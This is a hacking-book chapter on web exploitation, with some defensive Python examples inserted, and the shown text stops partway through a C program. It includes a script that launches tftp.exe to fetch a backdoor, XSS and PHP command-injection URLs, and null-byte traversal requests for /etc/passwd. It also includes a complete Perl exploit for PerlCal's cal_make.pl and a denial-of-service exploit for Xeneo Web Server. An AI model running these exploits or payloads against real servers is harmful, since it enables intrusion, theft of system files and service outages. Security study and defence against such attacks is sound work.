Web Exploitation

This chapter discusses the most common attacks we know of. Hackers exploit web weaknesses that are rarely, if ever, controlled. The most common web server weaknesses exist not only in Microsoft Internet Information Server (IIS) but also in the Sun ONE Java web server, Apache and other web servers.


Hackers study the most common and widely used web server products, looking for remotely exploitable vulnerabilities that give root or full access. The reason is that once a remotely exploitable bug is found, the hacker can run malicious code on thousands, if not tens of thousands, of hosts.


The Evolution of Web Applications

Today's Internet environment is a mixture of different technologies, protocols and operating systems scattered across the globe. This mixture can create barriers to applications communicating with one another.

Web applications hold enormous potential for users and developers, but they can also become a nightmare for security and system administration. Most web code is written to work around some existing security practice, relies on a particular application framework, and is not independent of the platform it runs on. Most companies and other developers write code in a hurry to deploy their web applications. That is why so many vulnerabilities can be found in this code, vulnerabilities that expose customers and system users to attack.


Most web applications keep gaining more functionality and more scalability, which adds many potential vulnerabilities to the code. Companies expect to gain a competitive edge from emerging technologies, but they should make sure a security expert reviews the code before the product is sold to the public. This helps reduce the chance that a hacker finds a remote or local vulnerability in the application. Most web attacks take place at the application layer. A hacker does not need extensive knowledge to gain access to a local network or a standalone system.


See Table 1-1 for a short summary of typical web application technologies.


Table 1-1 Web Application Technologies

Vendor            Technologies
Sun Microsystems  Java 2 Enterprise Edition
BEA               Weblogic
IBM               Websphere
Microsoft         javascript, ASP.NET, ISAPI, Common Object Model (COM), Active Server Pages (ASP)
Apache            Jakarta (server-side Java) and PHP
Generic           HTML, Perl and CGI


The Evolution of Web Exploitation


As web applications have developed, web exploitation has developed with them, from basic directory listings to remotely exploitable buffer overflows. Many companies work hard to find ways to write secure code, but hackers keep looking for new and more sophisticated ways of finding bugs and exploiting them.


Malicious Objects: Java/ActiveX Objects


Java and javascript


Java objects, or applets, are small applications written in Sun Microsystems' Java programming language. Java is an object-oriented language: it treats every element as an object. Java code is compiled and packaged into a .class file that is stored on the web server, so unlike some other languages its source is not disclosed to the web client. Java is one of the most popular Internet development tools today; it gives developers portable code that can be executed on the client side over the web.

Another avenue hackers target is javascript. javascript is a scripting language that can be used in many server-side and client-side applications.


javascript is mainly used to accept user input and tie other components together. All major web browsers have a built-in javascript engine that takes the plain-text javascript code and interprets the instructions on the client side. Below is a very basic javascript example that shows a popup box when a button is clicked.

Example: javascript Popup Box

<html>
<head>
<title>Basic javascript Example</title>
<script language="javascript">
<!-- hide for javascript challenged browsers

function popup1()
{
    alert("Hello World!");
}

// -->
</script>
</head>
<body>
<h1 align=center>Basic javascript Example</h1>
<div align=center>
<form>
<input type="button" value="Hello World!" onclick="popup1()">
</form>
</div>
</body>
</html>

The example above is meant to familiarize you with the language and to give you an idea of what to look for when hacking web applications.

Because javascript is executed on the client side, a hacker can supply non-standard input that gets executed, causing the application to disclose sensitive information or to crash.

Below is an example of malicious javascript that executes the tftp.exe program on the client's local machine.

Example: Execute TFTP Client

<html>
<head>
<title>Execute tftp.exe</title>
<script language="javascript">
<!-- hide for javascript challenged browsers

// window.createPopup() is an Internet Explorer-only API
var popup1 = window.createPopup();

function popup2()
{
    var popUpBody = popup1.document.body;
    popUpBody.innerHTML = '<OBJECT NAME="X" ' +
        'CLASSID="CLSID:11111111-1111-1111-1111-111111111111" ' +
        'CODEBASE="C:/Windows/system32/tftp.exe">' +
        '</OBJECT>';
    popup1.show(390, 290, 300, 300, document.body);
}

// -->
</script>
</head>
<body>
<P onclick="popup2();"><U><font color="#BBBBBB">TFTP</font></U></P>
</body>
</html>


With the code above, clicking the "TFTP" link opens the TFTP (Trivial File Transfer Protocol) client on the remote system. Once TFTP is running, the client can download malicious code such as a backdoor, giving the hacker full access to the system.


ActiveX

Microsoft invented its own client-side scripting model, commonly called ActiveX. ActiveX is a by-product of two other technologies, COM and OLE. Unlike javascript, ActiveX has full access to the operating system, which is why Microsoft developed a signing system: the user's browser can identify an ActiveX control and authorize it before executing it.
Typical Web Application Vulnerabilities

Cross-Site Scripting
Cross-site scripting attacks are among the most common security problems today. Most web sites now contain a great deal of dynamic content to make the site more user-friendly. Web applications are used to generate and deliver different kinds of output to the user depending on the web browser's settings. Dynamic web sites face a threat that static web sites do not; it is called "cross-site scripting".

A cross-site scripting attack occurs when a web application gathers malicious data from a user. Usually the data is gathered in the form of a hyperlink that contains malicious code; the hacker gets the user to click the malicious link in an email, instant message, forum post or web site. Once the web application has gathered the data, it generates a page for the user that contains the malicious data originally sent to it, but in a way that makes it look like valid content coming from the legitimate site.

An Example of a Cross-Site Scripting Attack
If a web site or web server does not check for script code and sends it back verbatim to the user's browser, that is when serious damage occurs. Hackers can use cross-site scripting weaknesses to obtain a user's cookies, login details and other sensitive information.
Several products have been vulnerable to cross-site scripting attacks that let a hacker use the Java servlet container to echo malicious javascript code back to the user. This lets a hacker construct cross-site scripting attacks in which the user receives the malicious script from a server they trust.
Below are some older web servers that were vulnerable to cross-site scripting:
Resin 1.2.2:
http://www.targeted_host/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp

WebSphere 3.02:
http://www.targeted_host/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp

JRun 3.0:
http://www.targeted_host/<SCRIPT>alert(document.cookie)</SCRIPT>.shtml

These pages will produce the following output:

Message: File not found: file://
StackTrace: com.ibm.servlet.engine.webapp.WebAppErrorReport: File not found: file://******
at javax.servlet.ServletException.<init>(ServletException.java:107)
at com.ibm.websphere.servlet.error.ServletErrorReport.<init>(ServletErrorReport.java:31)
at com.ibm.servlet.engine.webapp.WebAppErrorReport.<init>(WebAppErrorReport.java:20)
at com.ibm.servlet.engine.webapp.WebAppDispatcherResponse.sendError(WebAppDispatcherResponse.java:97)
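The containers above were vulnerable because the "File not found" error page echoed the requested name unescaped. As an added example, not taken from the original chapter or from any of the vendors' code, here is that error page in Python in its vulnerable and its hardened form, rendered against a constructed request path shaped like the URLs above:

```python
import html
import re

# Constructed request path, modelled on the Resin/WebSphere/JRun examples.
ATTACK_PATH = '/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp'


def render_not_found_vulnerable(requested: str) -> str:
    """Echoes the requested name verbatim: the defect in the old containers."""
    return ("<html><body>Message: File not found: "
            + requested + "</body></html>")


def render_not_found_hardened(requested: str) -> str:
    """HTML-encodes the untrusted name before placing it in the page body,
    so '<' and '>' reach the browser as '&lt;' and '&gt;' (text, not markup)."""
    return ("<html><body>Message: File not found: "
            + html.escape(requested, quote=True) + "</body></html>")


_SCRIPT_TAG_RE = re.compile(r"<\s*script", re.IGNORECASE)


def contains_live_script(page: str) -> bool:
    """True if the page carries a raw <script> tag a browser would execute."""
    return _SCRIPT_TAG_RE.search(page) is not None
```

The same rule applies to any untrusted value that lands in an error page, including headers such as Referer or Host.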

Cookie Manipulation
Cookie manipulation is a form of attack in which a hacker modifies specific data in transit between the client and the web application, rather than data that is stored directly. This form of attack can be carried out through URL strings, cookies and form fields, and is known as a man-in-the-middle attack.

Cookies are mainly used as a convenient place to store user data and parameters, and they carry tokens. Most cookies can be modified by the user and sent back to the server with a different request; there are free tools that do exactly this. How much a manipulated cookie matters depends on what the cookie is used for. Most cookies are used for session tokens to a range of arrays that make authentication decisions.

About 90% of cookies are base64 encoded. Below is a basic example of the HTTP header a browser receives.
Example: Set-Cookie

Set-Cookie: varUserName=c0nnie;&varUserID=TF7044959 expires=Thu, 19 July 2010 20:00:00 GMT; path=/; domain=.security-protocols.com

The browser interprets this as an instruction and stores the values for that page. So whenever the user requests a page from the server, the request carries the cookie below as extra data in the HTTP header. Below is an example of the HTTP header exchanged with the web application once the user has logged in.

Cookie: varUserName=c0nnie;&varUserID=TF7044959

As you can see from this example, the cookie is used to keep a record of our login ID. This is why it is good practice to regularly delete all cookies from your local machine. Since the cookie is plain-text input that is sent back to the server, it can obviously be changed easily. So think about what a hacker could gain by manipulating a cookie.

The example cookie is very straightforward and easy to exploit. As you can see, the user ID value is the field we should try to change. Once I change its value and log back into the server, I get a "Welcome Phil" message. It looks as though we have taken over another user's login and account. So I bet you are wondering how the web application knew that user ID TF7044959 belongs to Phil. Phil never logged into our site, so it must be stored on the system in something like a database.
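The fix for the scenario just described is to make the cookie tamper-evident (or, better still, to store only an opaque random session ID and look the user up server-side). The Python below is an added example, not part of the original chapter or of any product it mentions: it signs the varUserName/varUserID cookie from the example with an HMAC and rejects a cookie whose varUserID has been edited. The server key and the user table are constructed placeholders.

```python
import hashlib
import hmac
from typing import Optional

# Server-side key; a constructed placeholder for this example. A real deployment
# loads it from protected configuration and never sends it to the client.
SERVER_KEY = b"example-only-key-do-not-reuse"


def _payload(fields: dict) -> str:
    # Deterministic ordering so signing and verification hash the same bytes.
    return ";".join(f"{k}={v}" for k, v in sorted(fields.items()))


def sign_cookie(fields: dict) -> str:
    """Build the cookie value and append an HMAC-SHA256 tag over the payload."""
    payload = _payload(fields)
    tag = hmac.new(SERVER_KEY, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload};sig={tag}"


def parse_cookie(raw: str) -> dict:
    """Split 'k=v;k=v' into a dict, tolerating the ';&' form in the page's example."""
    fields = {}
    for part in raw.split(";"):
        part = part.strip().lstrip("&")
        if "=" in part:
            k, v = part.split("=", 1)
            fields[k.strip()] = v.strip()
    return fields


def verify_cookie(raw: str) -> Optional[dict]:
    """Return the fields only if the tag matches; None means unsigned or tampered."""
    fields = parse_cookie(raw)
    tag = fields.pop("sig", None)
    if tag is None:
        return None
    expected = hmac.new(SERVER_KEY, _payload(fields).encode(),
                        hashlib.sha256).hexdigest()
    # constant-time comparison so timing does not leak how many bytes matched
    if not hmac.compare_digest(tag, expected):
        return None
    return fields


def welcome_message(raw_cookie: str, users: dict) -> str:
    """What the 'Welcome ...' page should do: trust varUserID only after verification."""
    fields = verify_cookie(raw_cookie)
    if fields is None or fields.get("varUserID") not in users:
        return "Please log in"
    return f"Welcome {users[fields['varUserID']]}"
```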

Techniques for Finding and Exploiting Vulnerabilities
Web servers have always been the easiest way for a hacker to get into an internal network, or simply to compromise systems exposed on the Internet. As we said at the beginning of this chapter, web applications are normally coded as fast as possible and the thought of coding securely never enters the programmers' minds. There are numerous ways of finding vulnerabilities in web servers. The next few sections give examples of common fingerprints used in the exploitation of both web servers and web applications.

Basic Exploitation Techniques

‘<?’ Method

The '<?' method can be used to insert PHP code into a remote web application. It is possible to execute arbitrary commands on a remote server using this technique. Below is an example of how it can be used.

Example: <?

http://target_host/webapp.php=<?passthru("id");?>


On some PHP applications, this may allow the command to be executed locally on the remote host under the user the web server is running as.

‘;’ Method

The ';' character allows multiple commands to be executed on UNIX or Linux machines.

Example: ‘;’

[root@c0nnie]# id;uname -a
uid=0(root) gid=0(root) groups=0(root)
Linux c0nnie 2.4.19-16mdk #1 Fri Sep 20 18:15:05 CEST 2002 i686 unknown unknown GNU/Linux


This technique is often used to execute multiple commands on a web server in order to gain sensitive information.

‘|’ Method

The pipe character is often used on UNIX or Linux systems to execute multiple commands at a time in one single request.

Example: ‘|’

http://target_host/foobar.pl?page=../../../../bin/ls%20-al%20/home|


The request above will give a full directory listing of the 'home' directory on the targeted host.

‘%00’ Method

The %00 is the hex value of a null byte. This can be used to trick a web application into thinking that a different file type is being requested.

Example: ‘%00’

http://target_host/foobar.pl?page=../../../../etc/passwd

The web application will refuse this request because it checks for a valid file name ending in .asp, .html or some other file extension.

http://target_host/foobar.pl?page=../../../etc/passwd%00html

Now with this request, it tricks the web application into thinking that the filename ends in one of its file types. This is a very common problem in web applications.


‘%20’ Method

The %20 is the hex value for a blank space. This request can be used to help you execute commands on the host. See the example below.

Example: ‘%20’

http://target_host/foobar.pl?page=uname%20-a|


The example above will output the result of the 'uname -a' command on a UNIX or Linux system. This may let an attacker see what type of operating system the host is running, and the method can be combined with other variations of choice.
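Each of the five techniques above leaves a recognisable trace in the web server's access log once the request target is percent-decoded. The Python below is an added example, not from the original chapter: it decodes each request target (twice, to catch double encoding) and tags the null-byte, traversal, shell-metacharacter and PHP-tag patterns over a few constructed Apache-style log lines modelled on the URLs in this section.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines built from the request shapes discussed above;
# the client addresses, timestamps and sizes are made up.
SAMPLE_LOG = """\
192.0.2.10 - - [09/Sep/2002:10:00:01 +0000] "GET /index.html HTTP/1.0" 200 1043
192.0.2.11 - - [09/Sep/2002:10:00:02 +0000] "GET /foobar.pl?page=../../../../etc/passwd%00html HTTP/1.0" 200 512
192.0.2.12 - - [09/Sep/2002:10:00:03 +0000] "GET /foobar.pl?page=uname%20-a| HTTP/1.0" 200 88
192.0.2.13 - - [09/Sep/2002:10:00:04 +0000] "GET /webapp.php?page=%3C?passthru(%22id%22);?%3E HTTP/1.0" 200 60
192.0.2.14 - - [09/Sep/2002:10:00:05 +0000] "GET /search.pl?q=hello%20world HTTP/1.0" 200 2048
"""

# client, ident, user, [timestamp], "METHOD target HTTP/x"
_REQUEST_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) HTTP/')

# Each rule is evaluated against the fully decoded request target.
RULES = (
    ("null-byte",      lambda s: "\x00" in s),
    ("traversal",      lambda s: "../" in s or "..\\" in s),
    ("shell-metachar", lambda s: re.search(r"[;|`]", s) is not None),
    ("php-tag",        lambda s: "<?" in s),
)


def classify_request(target: str) -> list:
    """Return the names of every rule the decoded request target triggers."""
    decoded = unquote(target)
    # second pass catches the double-encoded form (%2500 -> %00 -> NUL)
    decoded = unquote(decoded)
    return [name for name, hit in RULES if hit(decoded)]


def scan_log(text: str) -> list:
    """Return (client, raw target, tags) for each log line that triggers a rule."""
    findings = []
    for line in text.splitlines():
        m = _REQUEST_RE.match(line)
        if not m:
            continue          # not a request line we understand; skip it
        client, target = m.group(1), m.group(2)
        tags = classify_request(target)
        if tags:
            findings.append((client, target, tags))
    return findings


if __name__ == "__main__":
    for client, target, tags in scan_log(SAMPLE_LOG):
        print(f"{client} {','.join(tags)} {target}")
```

A plain '%20' on its own is deliberately not a rule: a space is normal in search queries, and it only becomes interesting together with the metacharacters around it.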

Directory Traversal Vulnerabilities

A directory traversal occurs when a web application or web server does not filter out bad characters sent by a hacker. The hacker can send a bad request that results in the disclosure of directories and files outside the normal HTTP root directory.

PerlCal cal_make.pl Directory Traversal

Back in April 2001 a guy by the name of Stan, a.k.a. The Pike, found a directory traversal in PerlCal cal_make.pl. PerlCal is a web scheduler/calendar server managed by CGI scripts. This particular vulnerability allows anyone to download any file on the local system. Below is an example HTTP request to do so.

Example: 'cal_make.pl'

http://target_host/cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../etc/passwd%00


The request above retrieves the local system's passwd file, which contains all the user accounts on the system. If this is an older system, the passwd file may not be shadowed, making it easy to crack. I coded a very simple exploit for this vulnerability below.

PerlCal cal_make.pl Exploit

#!/usr/bin/perl
# PerlCal cal_make.pl directory traversal
# this vuln was found by: Stan a.k.a. ThePike
#
# Vulnerable systems:
# PerlCal version 2.95 and prior (UNIX)
#
# Written by tommy <[email protected]>
# For Security-Protocols Research Labs
# 09/09/02
#
# usage:
# perl sp-perlcal.pl targeted_host /etc/passwd or /proc/version
#
#
################

use IO::Socket;   # also exports inet_aton, sockaddr_in, PF_INET, SOCK_STREAM
use strict;

print "-"x74;
print "\nPerlCal cal_make.pl directory traversal, tommy\@security-protocols.com\n";
print "-"x74;
print "\n\n";

my $host = $ARGV[0] || die "usage: $0 targeted_host [/path/to/file]\n";
my $port = 80;
my $fuxor = "/etc/passwd%00";   # file to fetch; the %00 cuts off any suffix the script appends
my $lin;
my @thedata;

($ARGV[1]) && ($fuxor = $ARGV[1]."%00");

print "w0rking on getting $fuxor from $host\n";

my $iaddr = inet_aton($host) || die print("host was not found: $host");
my $paddr = sockaddr_in($port, $iaddr) || die print("you did something wrong stupid... exiting...");
my $proto = getprotobyname('tcp') || die print("cannot get protocol");
socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die print("socket could not open: $!");
connect(SOCK, $paddr) || die print("cannot connect: $!");

# HTTP/0.9-style request: no version, no headers, terminated by a blank line
my $submit = "GET /cgi-bin/cal_make.pl?p0=../../../../../../../../../../../..$fuxor\n\n";
send(SOCK,$submit,0);
@thedata=<SOCK>;

close (SOCK);

foreach $lin(@thedata)
{
    print "$lin";
}

print "\n-----------------------------------EOF------------------------------------\n\n";

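The cal_make.pl traversal and the '%00' trick from the previous section come down to the same missing checks on a user-supplied file name. The Python below is an added example, not PerlCal's code or the original chapter's: it decodes the parameter, rejects NUL bytes and parent-directory components, checks the extension on the decoded name, and confines the canonical path to an assumed document root (/var/www/html is a placeholder setting).

```python
import os
from urllib.parse import unquote

# Assumed settings for this example; a real server would load them.
WEB_ROOT = "/var/www/html"
ALLOWED_SUFFIXES = (".html", ".htm")


class UnsafePath(ValueError):
    """Raised when a user-supplied file name fails one of the checks."""


def resolve_page(param: str, web_root: str = WEB_ROOT) -> str:
    """Map a 'page=' or 'p0=' style parameter onto a file inside web_root.

    Order matters: decode first, then reject NUL bytes, then check the
    extension on the *decoded* name, then confine the canonical path.
    Checking the suffix before decoding is exactly what '%00html' defeats.
    """
    decoded = unquote(param)
    if "\x00" in decoded:
        raise UnsafePath("NUL byte in file name")
    parts = decoded.replace("\\", "/").split("/")
    if decoded.startswith(("/", "\\")) or ".." in parts:
        raise UnsafePath("absolute path or parent-directory reference")
    if not decoded.lower().endswith(ALLOWED_SUFFIXES):
        raise UnsafePath("file type not allowed")
    root = os.path.realpath(web_root)
    full = os.path.realpath(os.path.join(root, decoded))
    # belt and braces: even if a check above were bypassed, the canonical
    # path must still sit under the canonical document root
    if os.path.commonpath([root, full]) != root:
        raise UnsafePath("canonical path leaves the document root")
    return full


def is_safe_page(param: str, web_root: str = WEB_ROOT) -> bool:
    """Boolean wrapper so callers can test a parameter without handling errors."""
    try:
        resolve_page(param, web_root)
    except UnsafePath:
        return False
    return True
```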

Web Server and Web Application Vulnerability Scanning Software

In this section we present some tools which can be used to identify web server software vulnerabilities. We have used and evaluated almost all web server vulnerability scanners, and the following seem to be the best to use.

Nikto

Nikto is a web server vulnerability scanner written by Chris Sullo. Nikto performs comprehensive testing against web servers for multiple vulnerabilities, including misconfigurations, insecure or default files and scripts, and over 130 server versions. We feel that this is the best free web server scanner available. Nikto uses RFP's LibWhisker as the base for all socket functionality. Some of Nikto's main features are multiple IDS evasion techniques, SSL support and Perl plug-in support.

Nikto has so many checks, and scans so fast, that it will overwhelm smaller web servers and will definitely show up in intrusion detection logs and web server logs. There is an IDS evasion option which can be used. The best thing about this tool is that you can code your own plug-ins if you want.


Whisker

The long-anticipated version 2.1 of Whisker has been released. Whisker is a very robust scanning tool. Its main function is to scan remote web servers for known files. Whisker was introduced in the early days, when most bugs were associated with CGI scripts that had known, exploitable vulnerabilities. Below we demonstrate how Whisker works. Please note that Whisker is a Perl script, so make sure you have Perl installed.

Whisker comes with a set of database files which the scan engine takes as its primary configuration. The included database files tell Whisker what directories and files to look for, and a few other things such as how web servers react to certain requests. Here is how to run Whisker against a host:

[tf0ne@c0nnie tf0ne]$ perl -h http://target_host.com/

-----------------------------------------------------------------------

Title: Notice

Whisker scans for CGIs by checking to see if the server says a particular URL exists. However, just because a URL exists does not necessarily mean it is vulnerable/exploitable--the vulnerability might be limited to only a certain version of the CGI, and the server might not be using the vulnerable version. There is also the case where many scripts use the same generic CGI name (like count.cgi); in this case, the exact CGI being used may not be the same one that contains the vulnerability.

Thus, the actual vulnerability of the CGI must be verified in order to get a true assessment of risk. Whisker only helps in pointing out the problem areas. The next step after scanning with whisker is to review each found CGI by reviewing the reference URLs or searching for the CGI name on SecurityFocus.com or Google.com.

-----------------------------------------------------------------------

Beginning scan against http://www.target_host.com

----------------------------------------------------------------------

Whisker is currently crawling the website; please be patient.

-----------------------------------------------------------------------

Title: Server banner
Id: 100
Severity: Informational

The server returned the following banner:
Microsoft-IIS/5.0

-----------------------------------------------------------------------

Whisker is done crawling the website.
-----------------------------------------------------------------------

Title: Server banner
Id: 100
Severity: Informational

The server returned the following banner:
Microsoft-IIS/5.0

-----------------------------------------------------------------------

Title: Server OPTIONS results
Id: 109
Severity: Informational

The server responded to an OPTIONS query with the following public methods:
OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOC, UNLOCK, SEARCH
The allowed methods for '/' are:
OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH

-----------------------------------------------------------------------

Title: Server patch level
Id: 111
Severity: Informational

Testing indicates server patch level to be at or after the following level: Win2K IIS-SRP1 (MS02-018) or SP3


-----------------------------------------------------------------------

Title: viewcode.asp
Id: 621
Bid: 167
Cve: 1999-0736
Found URL: /sites/samples/knowledge/membership/inspired/viewcode.asp

No specific information is provided for this item.

References:
http://online.securityfocus.com/bid/167
http://cve.mitre.org/cgi-bin/cvename.cgi?name=1999-0736

-----------------------------------------------------------------------

Title: viewcode.asp
Id: 622
Bid: 167
Cve: 1999-0736
Found URL: /sites/samples/knowledge/membership/inspiredtutorial/viewcode.asp

No specific information is provided for this item.
References:
http://online.securityfocus.com/bid/167
http://cve.mitre.org/cgi-bin/cvename.cgi?name=1999-0736

-----------------------------------------------------------------------

Title: viewcode.asp
Id: 624
Bid: 167
Cve: 1999-0736
Found URL: /sites/samples/knowledge/push/viewcode.asp

No specific information is provided for this item.

References:
http://online.securityfocus.com/bid/167
http://cve.mitre.org/cgi-bin/cvename.cgi?name=1999-0736

-----------------------------------------------------------------------

Title: viewcode.asp
Id: 627
Found URL: /siteserver/publishing/viewcode.asp

No specific information is provided for this item.

-----------------------------------------------------------------------

Title: Encountered cookies
Severity: Informational

The following cookies were encountered while scanning:
ASPSESSIONIDSCQATDSA=POKECCICFCJFEMDBHHMKLFIG; path=/

-----------------------------------------------------------------------


Whisker scan completed in 1 minute.

After looking over the output, Whisker has found several potentially exploitable files and directories on this Microsoft IIS 5.0 system. The nice thing about Whisker 2.1 is that it provides URL links and detailed information on the files it finds. Whisker is a very powerful tool that is easy for anyone to use. We hope that RFP continues to support this great tool.

Shadow Security Scanner

One of the newer and very impressive vulnerability scanners is Shadow Security Scanner by Safety Lab. This is not just a web server scanner but a full-fledged vulnerability scanner. The latest version as of this writing is SSS 5.41.

Shadow Security Scanner was designed to identify known vulnerabilities, suggest fixes for the vulnerabilities it identifies, and report other security holes within the network. Shadow Security Scanner has very flexible policies on which audits to perform. There is a nice policy wizard which helps you select exactly which ports you wish to scan.

Figure 1-1 Shadow Security Scanner


The reports produced after a scan are very detailed, which makes it easy for any user to read them and act on vulnerabilities found within their network. Shadow Security Scanner has a very nice auto-update feature which lets you update the scan modules on a daily basis. Although this tool is not free, it is definitely worth a try if you are looking for a robust tool.

Blindly Fuzzing Web Servers for Vulnerabilities

I have had a lot of success fuzzing web servers and other applications for bugs. There are a few really good fuzzer tools out there. In my experience, SPIKE, which was written by Dave Aitel, has found numerous remotely exploitable bugs.

SPIKE

SPIKE is an API and a tool that lets you quickly create network protocol stress tests; with SPIKE, reproducing any complex binary protocol becomes very fast. The coolest thing is that you can test old techniques against new products. Against most form-based web applications, SPIKE can quickly find buffer overflows, SQL injection bugs and format string bugs. I have found it very useful in my work.
There are many advantages to using SPIKE's framework over Perl scripts. SPIKE integrates very well with libntlm and other GPL'ed libraries for doing encryption and other things for which you don't have Perl modules.

SPIKE Programs for Web Applications

·generic_web_server_fuzz
·closed_source_web_server_fuzzer
·webfuzz.c
·webmitm
·ntlm2/ntlm_brute


Below I will show you how to run SPIKE using the closed_source_web_server_fuzz program against Xeneo Web Server 2.2.2.10.0. Let's see what we find!

[tf0ne@c0nnie src]$ ./closed_source_web_server_fuzz 192.168.1.103 80 GET / index .html 0 0

After about an hour of fuzzing, the closed_source_web_server_fuzz program segfaulted (meaning that it found a bug). After looking over the output from SPIKE, I found that the following GET request crashed the web server:


GET /index.html?testvariable=&nexttestvariable=gif HTTP/1.1
Referer: http://localhost/%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Content-Type: application/x-www-form-urlencoded
Connection: Keep-Alive
Cookie: VARIABLE=SPLABS; path=/
User-Agent: Mozilla/4.76 [en] (X11; U; Linux 2.4.2-2 i686)
Variable: result
Host: localhost
Content-length: 513
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8
whatyoutyped=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Now that we have a malicious packet, we can easily write exploit code. The exploit below reproduces this vulnerability.

Xeneo Web Server 2.2.2.10.0 DoS Exploit

/* Xeneo Web Server 2.2.2.10.0 DoS
 *
 * Vulnerable systems:
 * Xeneo Web Server 2.2.10.0
 * Vendor:
 * http://www.northernsolutions.com
 *
 * Written and found by tommy <[email protected]>
 * For SP Research Labs
 * 04/23/2003
 *
 * www.security-protocols.com
 *
 * usage:
 * sp-xeneo2 <targetip> [targetport] (default is 80)
 */

#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>   /* exit, atoi */
#include <string.h>   /* memcpy, memset */

#pragma comment(lib, "ws2_32.lib")

/* the request captured from the SPIKE run above, as one C string */
char exploit[] =

"GET /index.html?testvariable=&nexttestvariable=gif HTTP/1.1\r\n"
"Referer: http://localhost/%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%"
"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%"
"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%"
"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%"
"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%"
"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%"
"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%"
"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%"
"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%"
"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n"
"Connection: Keep-Alive\r\n"
"Cookie: VARIABLE=SPLABS; path=/\r\n"
"User-Agent: Mozilla/4.76 [en] (X11; U; Linux 2.4.2-2 i686)\r\n"
"Variable: result\r\n"
"Host: localhost\r\n"
"Content-length: 513\r\n"
"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png\r\n"
"Accept-Encoding: gzip\r\n"
"Accept-Language: en\r\n"
"Accept-Charset: iso-8859-1,*,utf-8\r\n\r\n\r\n"
"whatyoutyped=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n";

int main(int argc, char *argv[])
{
    WSADATA wsaData;
    WORD wVersionRequested;
    struct hostent *pTarget;
    struct sockaddr_in sock;
    char *target;
    int port;
    SOCKET mysocket;

    if (argc < 2)
    {
